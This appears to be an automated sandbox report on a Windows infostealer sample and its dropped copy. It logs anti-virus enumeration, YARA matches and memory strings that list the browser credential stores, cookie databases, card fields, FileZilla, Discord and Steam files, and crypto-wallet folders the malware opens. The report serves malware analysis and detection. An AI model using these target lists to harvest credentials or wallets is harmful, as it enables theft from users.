                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Users\user\Desktop\PZNfhfaj9O.exe VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Queries volume information: C:\Users\user\AppData\Roaming\CiENBY.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1993766836.00000000077D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e42720.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3ef3958.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e2a900.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3edbb38.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.PZNfhfaj9O.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3ef3958.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3edbb38.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e42720.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e2a900.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PZNfhfaj9O.exe PID: 7148, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PZNfhfaj9O.exe PID: 7204, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CiENBY.exe PID: 7296, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CiENBY.exe PID: 7728, type: MEMORYSTR
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $tq1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                    Source: CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Source: CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $tq5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

                    Remote Access Functionality

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e42720.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3ef3958.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e2a900.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3edbb38.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.PZNfhfaj9O.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3ef3958.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3edbb38.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e42720.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e2a900.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PZNfhfaj9O.exe PID: 7148, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PZNfhfaj9O.exe PID: 7204, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CiENBY.exe PID: 7296, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CiENBY.exe PID: 7728, type: MEMORYSTR

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
